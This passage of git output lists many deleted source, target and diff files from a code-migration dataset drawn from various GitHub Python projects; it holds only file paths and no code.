 delete mode 100644 v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py
 delete mode 100644 v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py
 delete mode 100644 v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff
 delete mode 100644 v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py
 delete mode 100644 v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff
 delete mode 100644 v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py
 delete mode 100644 v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py
 delete mode 100644 v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff
 delete mode 100644 v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py
 delete mode 100644 v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py
 delete mode 100644 v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$sql_schema_fields.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py
 delete mode 100644 v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py
 delete mode 100644 v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff
 delete mode 100644 v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py
 delete mode 100644 v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py
 delete mode 100644 v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff
 delete mode 100644 v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py
 delete mode 100644 v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py
 delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff
 delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py
 delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py
 delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff
 delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py
 delete mode 100644 v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.diff
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.source.py
 delete mode 100644 v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$utils.py.target.py
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.diff
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.source.py
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff
 delete mode 100644 v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py
 delete mode 100644
v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py delete mode 100644 v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff delete mode 100644 v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py delete mode 100644 v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.diff delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.diff delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py delete mode 100644 v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py delete mode 100644 v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff delete mode 100644 v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py delete mode 100644 v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py delete mode 100644 v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff delete mode 100644 v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py delete mode 100644 v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_images.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_experiments.py.target.py delete mode 100644 
v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_sessions.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_validations.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py delete mode 100644 v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py delete mode 100644 v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py delete mode 100644 
v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py delete mode 100644 v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff 
delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py delete mode 100644 v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py delete mode 100644 v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff delete mode 100644 v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py delete mode 100644 v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py delete mode 100644 v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff delete mode 100644 v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py delete mode 100644 v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py delete mode 100644 v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.diff delete mode 100644 v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.source.py delete mode 100644 v1/data/codefile/rocketmap@rocketmap__2960ec6__pogom$utils.py.target.py delete mode 100644 v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.diff delete mode 100644 v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.source.py delete mode 100644 v1/data/codefile/sapfir0@premier-eye__a7375cc__pyfront$app$__init__.py.target.py delete mode 100644 v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.diff delete mode 100644 v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py delete mode 100644 v1/data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py delete mode 100644 
v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py delete mode 100644 v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py delete mode 100644 v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff delete mode 100644 v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py delete mode 100644 v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py delete mode 100644 v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff delete mode 100644 v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py delete mode 100644 v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py delete mode 100644 v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff delete mode 100644 v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py delete mode 100644 v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py delete mode 100644 v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff delete mode 100644 v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py delete mode 100644 v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py delete mode 100644 v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff delete mode 100644 